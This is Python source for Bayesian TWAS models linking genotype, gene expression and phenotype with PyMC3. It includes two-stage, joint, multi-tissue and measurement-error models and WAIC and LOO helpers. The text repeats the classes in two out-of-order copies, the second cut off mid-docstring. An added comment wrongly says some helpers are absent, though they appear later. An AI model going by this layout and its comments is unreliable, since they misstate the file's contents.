=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_mediator, gwas_phen]
return phenotype_model
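# --- Worked numeric sketch (added) of the precomp_med branch above: with
# heritability h, alpha may explain sigma_p^2 * h / (1 - h) of phenotypic
# variance, and Var(alpha * M) ~ alpha^2 * (Var(M) + E[M]^2), which yields
# the prior variance of alpha.
def _demo_alpha_prior_variance(phenotype_sigma=1.0, h=0.1,
                               mediator_mu=0.0, mediator_sd=1.0):
    var_explained = phenotype_sigma ** 2 * h / (1 - h)  # 0.111... for h=0.1
    md_var = np.square(np.mean(mediator_sd))
    md_mean_sq = np.square(np.mean(mediator_mu))
    return var_explained / (md_var + md_mean_sq)        # prior Var(alpha)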
# Imports required by the code below. `tinvlogit` (inverse logit on tensors)
# and `calculate_waic` (returns waic, log_py, logp for a trace and model) are
# assumed local helpers not shown in this file.
import numpy as np
import pymc3 as pm
import theano.tensor as t
from scipy import optimize
from scipy.stats import norm
from theano import shared
class BayesianModel(object):
"""
General Bayesian Model Class for quantifying
relationship between gene and phenotype
Adapted from Thomas Wiecki
https://github.com/pymc-devs/pymc3/issues/511#issuecomment-125935523
"""
def __init__(self, variational=True, mb=False, n_chain=50000, n_trace=
5000, logistic=False, steps=None):
"""
Args:
variational (bool, optional): Use Variational Inference
mb (bool, optional): Use minibatches
"""
self.variational = variational
self.cached_model = None
self.mb = mb
self.n_chain = n_chain
self.n_trace = n_trace
self.logistic = logistic
self.steps = steps
def cache_model(self, **inputs):
"""
Create a cached model for the Bayesian model using
shared theano variables for each Bayesian
input parameter.
Args:
**inputs (dict): inputs for Bayesian model
"""
self.shared_vars = self._create_shared_vars(**inputs)
self.cached_model = self.create_model(**self.shared_vars)
def create_model(self, **inputs):
"""
Each subclass of this class needs to define
its PyMC3 model here.
"""
raise NotImplementedError('This method has to be overwritten.')
def _create_shared_vars(self, **inputs):
"""
For each input variable, create theano shared variable
and set their initial values.
Args:
**inputs (dict): inputs for Bayesian model
Returns:
dict: key, value - var_name, theano.shared variable
"""
shared_vars = {}
for name, data in inputs.items():
shared_vars[name] = shared(data, name=name)
return shared_vars
def _clean_inputs(self, inputs):
"""
Clean the inputs, i.e. remove some
genotype columns. Useful for some classes of Bayesian models,
such as Two-Stage, where the first stage involves filtering
on certain SNPs.
Args:
inputs (dict): inputs for Bayesian model
Returns:
dict: cleaned inputs for Bayesian model
"""
return inputs
def run(self, **inputs):
"""
Run cached Bayesian model using the inputs
Args:
**inputs (dict): inputs for Bayesian model
Returns:
trace: Trace of the PyMC3 inference
"""
if self.cached_model is None:
self.cache_model(**inputs)
for name, data in inputs.items():
self.shared_vars[name].set_value(data)
if self.mb and self.variational:
self.minibatches = zip(self._mb_generator(inputs['gwas_gen']),
self._mb_generator(inputs['gwas_phen']))
self.trace = self._inference()
return self.trace
def _inference(self, n_trace=None):
"""
Perform the inference. Uses ADVI if self.variational
is True. Also, uses minibatches if self.mb=True, based
on generators defined in self.run.
Otherwise, uses Metropolis.
Args:
n_trace (int, optional): Number of steps used for trace
Returns:
trace: Trace of the PyMC3 inference
"""
if n_trace is None:
n_trace = self.n_trace
with self.cached_model:
if self.variational:
if self.mb:
v_params = pm.variational.advi_minibatch(n=self.n_chain,
minibatch_tensors=self.minibatch_tensors,
minibatch_RVs=self.minibatch_RVs, minibatches=self.
minibatches)
else:
v_params = pm.variational.advi(n=self.n_chain)
trace = pm.variational.sample_vp(v_params, draws=n_trace)
self.v_params = v_params
else:
if self.steps is None:
self.steps = pm.Metropolis()
start = pm.find_MAP(fmin=optimize.fmin_powell)
trace = pm.sample(self.n_chain, step=self.steps, start=
start, progressbar=True)
trace = trace[-n_trace:]
self.trace = trace
return trace
def cross_validation(self, k_folds, **inputs):
"""
Run cross-validation on the inputs and calculate
statistics for each fold test set.
Args:
k_folds (sklearn.cross_validation): Folds of test and train
samples
**inputs (dict): inputs for Bayesian model
Returns:
dict: statistics for each fold
"""
self.cv_stats, self.cv_traces = [], []
self.k_folds = k_folds
inputs = self._clean_inputs(inputs)
for i, fold in enumerate(k_folds):
train, test = fold
input_train, input_test = {}, {}
for name, data in inputs.items():
if name in self.cv_vars:
input_train[name] = data[train]
input_test[name] = data[test]
else:
input_train[name] = data
input_test[name] = data
trace = self.run(**input_train)
stats = self.calculate_statistics(trace, **input_test)
self.cv_traces.append(trace)
self.cv_stats.append(stats)
return self.cv_traces, self.cv_stats
def calculate_ppc(self, trace):
"""
Calculate several posterior predictive checks
based on the trace.
"""
dic = pm.stats.dic(trace, self.cached_model)
waic, log_py, logp = calculate_waic(trace, self.cached_model)
mu, sd, zscore = self._alpha_stats(trace)
return {'dic': dic, 'waic': waic, 'logp': logp, 'mu': mu, 'sd': sd,
'zscore': zscore}
def calculate_statistics(self, trace, **input_test):
"""
Calculate mse and logp statistics on a test set.
Args:
**input_test (dict): test set of inputs
trace (PyMC3.trace): Trace of the inference chain
Returns:
dict: logp and mse
"""
inputs = self._clean_inputs(input_test)
mc_logp = self._logp(trace, **inputs)
mean_mse = self._mse(trace, **inputs)
mse2 = self._mse2(trace, **inputs)
mu, sd, zscore = self._alpha_stats(trace)
return {'logp': mc_logp, 'mse': mean_mse, 'mse2': mse2, 'mu': mu,
'sd': sd, 'zscore': zscore}
def calculate_bf(self, trace, var_name='mediator_model'):
"""
Calculate Bayes Factor using a Bernoulli variable in the
trace.
"""
p_alt = trace[var_name].mean()
bayes_factor = p_alt / (1 - p_alt)
return bayes_factor
def _logp(self, trace, **inputs):
"""
Calculate log likelihood using Monte Carlo integration.
Args:
**inputs (dict): inputs used in likelihood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Log likelihood as estimated by Monte Carlo integration
"""
def calc_log(step):
exp_pred = np.dot(inputs['gwas_gen'], step['beta_med'].T).ravel()
phen_pred = step['alpha'] * exp_pred
phen_prob = norm.logpdf(x=inputs['gwas_phen'], loc=phen_pred,
scale=step['phenotype_sigma'])
return phen_prob
phen_probs = [calc_log(trace[idx]) for idx in np.random.randint(0,
len(trace), 500)]
phen_probs = np.asmatrix(phen_probs)
mc_logp = phen_probs.sum(axis=1).mean()
return mc_logp
def _mse(self, trace, **inputs):
"""
Calculate mean squared error of the model fit.
Args:
**inputs (dict): inputs used in likelihood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Mean squared error across all samples
"""
phen_mse = []
for idx in np.random.randint(0, len(trace), 500):
step = trace[idx]
exp_pred = np.dot(inputs['gwas_gen'], step['beta_med'].T).ravel()
phen_pred = step['alpha'] * exp_pred
phen_mse.append(np.mean((inputs['gwas_phen'] - phen_pred) ** 2))
mean_mse = np.mean(phen_mse)
return mean_mse
def _mse2(self, trace, **inputs):
"""
Calculate mean squared error of the model fit
using posterior means of beta_med instead of
sampling from it.
Args:
**inputs (dict): inputs used in likelihood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Mean squared error across all samples
"""
exp = np.dot(inputs['gwas_gen'], trace['beta_med'].mean(axis=0).T)
phen_pred = exp * trace['alpha'].mean()
mse = np.mean((inputs['gwas_phen'] - phen_pred) ** 2)
return mse
def _alpha_stats(self, trace):
"""
Calculate statistics of the alpha value in
the trace.
"""
mean = np.mean(trace['alpha'])
sd = np.std(trace['alpha'], ddof=1)
zscore = mean / sd
return mean, sd, zscore
def _mb_generator(self, data, size=500):
"""
Generator for minibatches
"""
rng = np.random.RandomState(0)
while True:
ixs = rng.randint(len(data), size=size)
yield data[ixs]
class TwoStage(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10, *args, **kwargs):
"""
Args:
coef_mean (array): prior means for the SNP effect sizes
coef_sd (array): prior standard deviations for the SNP effect sizes
p_sigma_beta (int): scale of the HalfCauchy prior on the phenotype noise
"""
self.name = 'TwoStage'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStage, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_mu = intercept + alpha * phenotype_expression_mu
if self.logistic:
p = tinvlogit(phenotype_mu)
phen = pm.Bernoulli('phen', p=p, observed=gwas_phen)
else:
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=
self.vars['p_sigma_beta'])
phen = pm.Normal('phen', mu=phenotype_mu, sd=
phenotype_sigma, observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
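# --- Illustrative sketch (added): the logistic branch of TwoStage on a
# synthetic case/control phenotype.
def _demo_twostage_logistic():
    n_ind, n_snps = 300, 5
    gwas_gen = np.random.binomial(2, 0.4, size=(n_ind, n_snps)).astype(float)
    gwas_phen = np.random.binomial(1, 0.5, size=n_ind).astype(float)
    model = TwoStage(coef_mean=np.zeros((1, n_snps)),
                     coef_sd=0.1 * np.ones((1, n_snps)),
                     logistic=True, n_chain=10000, n_trace=1000)
    trace = model.run(gwas_gen=gwas_gen, gwas_phen=gwas_phen)
    return trace['alpha'].mean()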
class TwoStageBF(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10, *args, **kwargs):
"""
Args:
"""
self.name = 'TwoStageBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStageBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class Joint(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype.
"""
def __init__(self, model_type='laplace', coef_sd=None, coef_mean=None,
tau_beta=1, lambda_beta=1, m_sigma_beta=10, p_sigma_beta=10, *args,
**kwargs):
"""
Expression ~ N(X\\beta, \\sigma_exp)
P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(X\\beta\\alpha, \\sigma_phen)
P(\\alpha) ~ Uniform(-10, 10)
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
lambda_beta (int): P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'Joint'
self.model_type = model_type
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd, 'tau_beta':
tau_beta, 'lambda_beta': lambda_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
if model_type == 'laplace':
self.create_model = self._create_model_laplace
elif model_type == 'horseshoe':
self.create_model = self._create_model_horseshoe
elif model_type == 'prior':
self.create_model = self._create_model_prior
else:
raise NotImplementedError('Unsupported model type')
super(Joint, self).__init__(*args, **kwargs)
def _create_model_prior(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_horseshoe(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
tau_beta = pm.HalfCauchy('tau_beta', beta=self.vars['tau_beta'])
lambda_beta = pm.HalfCauchy('lambda_beta', beta=self.vars[
'lambda_beta'], shape=(1, n_snps))
total_variance = pm.dot(lambda_beta * lambda_beta, tau_beta *
tau_beta)
beta_med = pm.Normal('beta_med', mu=0, tau=1 / total_variance,
shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
alpha = pm.Normal('alpha', 0, 1)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_laplace(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=1, shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MultiStudyMultiTissue(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype in multiple studies
and multiple tissues. Assume that tissues from the same
individual are independent given the genotypes i.e.
P(TisA, TisB | G) = P(TisA | G) P(TisB | G)
"""
def __init__(self, m_laplace_beta=1, m_sigma_beta=10, p_sigma_beta=10,
*args, **kwargs):
"""
Expression ~ N(X\\beta, \\sigma_exp)
P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(X\\beta\\alpha, \\sigma_phen)
P(\\alpha) ~ Uniform(-10, 10)
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
lambda_beta (int): P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'MultiStudyMultiTissue'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'m_laplace_beta': m_laplace_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
super(MultiStudyMultiTissue, self).__init__(*args, **kwargs)
def set_idx(self, med_idx, gwas_idx):
self.med_idx = med_idx
self.gwas_idx = gwas_idx
return
def create_model(self, med_gen, med_phen, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
n_tissues = len(np.unique(self.med_idx))
n_studies = len(np.unique(self.gwas_idx))
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=self.vars[
'm_laplace_beta'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1,
shape=n_tissues)
mediator_gamma = pm.Uniform('mediator_gamma', lower=0, upper=1,
shape=n_tissues)
mediator_mu = mediator_intercept[self.med_idx] + mediator_gamma[
self.med_idx] * pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'], shape=n_tissues)
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma[self.med_idx], observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1, shape=n_studies)
alpha_mu = pm.Normal('alpha_mu', mu=0, sd=1)
alpha_sd = pm.HalfCauchy('alpha_sd', beta=1)
alpha = pm.Normal('alpha', mu=alpha_mu, sd=alpha_sd, shape=
n_studies)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=1,
shape=n_studies)
phen_mu = intercept[self.gwas_idx] + alpha[self.gwas_idx
] * phenotype_expression_mu
phen_sigma = phenotype_sigma[self.gwas_idx]
phen = pm.Normal('phen', mu=phen_mu, sd=phen_sigma, observed=
gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class NonMediated(BayesianModel):
"""
Model the relationship between the genotype and
phenotype without any added information about the
mediator. Use it as a basis for getting
the null distribution under a mediation analysis.
"""
def __init__(self, g_laplace_beta=1, p_sigma_beta=10, *args, **kwargs):
self.name = 'NonMediated'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'g_laplace_beta': g_laplace_beta, 'p_sigma_beta':
p_sigma_beta}
super(NonMediated, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta = pm.Laplace('beta', mu=0, b=self.vars['g_laplace_beta'],
shape=(1, n_snps))
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + pm.dot(beta, gwas_gen.T)
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MeasurementError(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, m_laplace_beta=1,
p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementError'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'p_sigma_beta': p_sigma_beta}
super(MeasurementError, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Uniform('alpha', lower=-10, upper=10)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * mediator
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_mediator, gwas_phen]
return phenotype_model
class MeasurementErrorBF(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, precomp_med=True,
heritability=0.1, p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementErrorBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'heritability': heritability, 'p_sigma_beta': p_sigma_beta,
'precomp_med': precomp_med}
super(MeasurementErrorBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
if self.vars['precomp_med']:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = np.square(np.mean(self.vars['mediator_sd']))
md_mean_sq = np.square(np.mean(self.vars['mediator_mu']))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
else:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = t.var(mediator)
md_mean_sq = t.sqr(t.mean(mediator))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_mediator, gwas_phen]
return phenotype_model
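# Editor's note (sketch, not part of the original file): the heritability-
# scaled alpha prior above solves
#     sigma_phen^2 * h / (1 - h) = var_alpha * (E[mediator]^2 + Var[mediator])
# for var_alpha, so alpha ~ N(0, sqrt(var_alpha)) assigns roughly a fraction
# h of the phenotypic variance to the mediated path a priori.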
| '''
Bayesian models for TWAS.
Author: Kunal Bhutani <[email protected]>
'''
from scipy.stats import norm
import pymc3 as pm
import numpy as np
from theano import shared
from scipy.stats.distributions import pareto
from scipy import optimize
import theano.tensor as t
def tinvlogit(x):
return t.exp(x) / (1 + t.exp(x))
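# Editor's note (hedged): t.exp(x) overflows for large positive x. Theano
# ships a numerically stable sigmoid that is equivalent to tinvlogit:
#
#     def tinvlogit_stable(x):
#         return t.nnet.sigmoid(x)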
def calculate_waic(trace, model=None, r_logp=True):
"""
Taken directly from PyMC3.
Reproduced to only take into account the phenotype and not mediator
variable when calculating logp.
Calculate the widely applicable information criterion (WAIC) and the effective
number of parameters of the samples in trace from model.
Read more theory here - in a paper by some of the
leading authorities on Model Selection - http://bit.ly/1W2YJ7c
"""
log_py = log_post_trace(trace, model)
lppd = np.sum(np.log(np.mean(np.exp(log_py), axis=0)))
p_waic = np.sum(np.var(log_py, axis=0))
if r_logp:
return -2 * lppd + 2 * p_waic, log_py, lppd
else:
return -2 * lppd + 2 * p_waic
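# Hedged usage sketch (illustrative names): log_py has shape
# (n_draws, n_points), so lppd and p_waic are sums over data points and
# WAIC = -2*lppd + 2*p_waic is reported on the deviance scale:
#
#     waic, log_py, lppd = calculate_waic(trace, model)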
def calculate_loo(trace=None, model=None, log_py=None):
"""
Taken directly from PyMC3.
Reproduced to only take into account the phenotype and not mediator
variable when calculating logp.
Calculates leave-one-out (LOO) cross-validation for out of sample
predictive model fit, following Vehtari et al. (2015).
Cross-validation is computed using Pareto-smoothed importance sampling.
Returns log pointwise predictive density calculated via
approximated LOO cross-validation.
"""
if log_py is None:
log_py = log_post_trace(trace, model)
# Importance ratios
r = 1. / np.exp(log_py)
r_sorted = np.sort(r, axis=0)
# Extract largest 20% of importance ratios and
# fit generalized Pareto to each
# (returns tuple with shape, location, scale)
q80 = int(len(log_py) * 0.8)
pareto_fit = np.apply_along_axis(lambda x: pareto.fit(x, floc=0),
0, r_sorted[q80:])
# Calculate expected values of the order statistics of the fitted Pareto
S = len(r_sorted)
M = S - q80
z = (np.arange(M) + 0.5) / M
expvals = map(lambda x: pareto.ppf(z, x[0], scale=x[2]), pareto_fit.T)
# Replace importance ratios with order statistics of fitted Pareto
r_sorted[q80:] = np.vstack(expvals).T
# Unsort ratios (within columns) before using them as weights
r_new = np.array([x[np.argsort(i)]
for x, i in zip(r_sorted,
np.argsort(r, axis=0))])
# Truncate weights to guarantee finite variance
w = np.minimum(r_new, r_new.mean(axis=0) * S**0.75)
loo_lppd = np.sum(np.log(np.sum(w * np.exp(log_py), axis=0) / np.sum(w, axis=0)))
return loo_lppd
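# Editor's note (hedged): following Vehtari et al. (2015), the fitted Pareto
# shape parameters (pareto_fit[0]) double as a diagnostic; values above
# roughly 0.7 flag observations where the importance-sampling approximation
# is unreliable.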
def log_post_trace(trace, model):
'''
Taken directly from PyMC3.
Reproduced to only take into account the phenotype and not mediator
variable when calculating logp.
Calculate the elementwise log-posterior for the sampled trace.
'''
logp = np.hstack([obs.logp_elemwise(pt) for pt in trace]
for obs in model.observed_RVs if obs.__repr__() == 'phen')
if len(logp.shape) > 2:
logp = logp.squeeze(axis=1)
return logp
class BayesianModel(object):
'''
General Bayesian Model Class for quantifying
relationship between gene and phenotype
Adapted from Thomas Wiecki
https://github.com/pymc-devs/pymc3/issues/511#issuecomment-125935523
'''
def __init__(self, variational=True, mb=False,
n_chain=50000, n_trace=5000,
logistic=False, steps=None):
"""
Args:
variational (bool, optional): Use Variational Inference
mb (bool, optional): Use minibatches
"""
self.variational = variational
self.cached_model = None
self.mb = mb
self.n_chain = n_chain
self.n_trace = n_trace
self.logistic = logistic
self.steps = steps
def cache_model(self, **inputs):
"""
Create a cached model for the Bayesian model using
shared theano variables for each Bayesian
input parameter.
Args:
**inputs (dict): inputs for Bayesian model
"""
self.shared_vars = self._create_shared_vars(**inputs)
self.cached_model = self.create_model(**self.shared_vars)
def create_model(self, **inputs):
"""
Each instance of this class needs to define
their PYMC3 model in here.
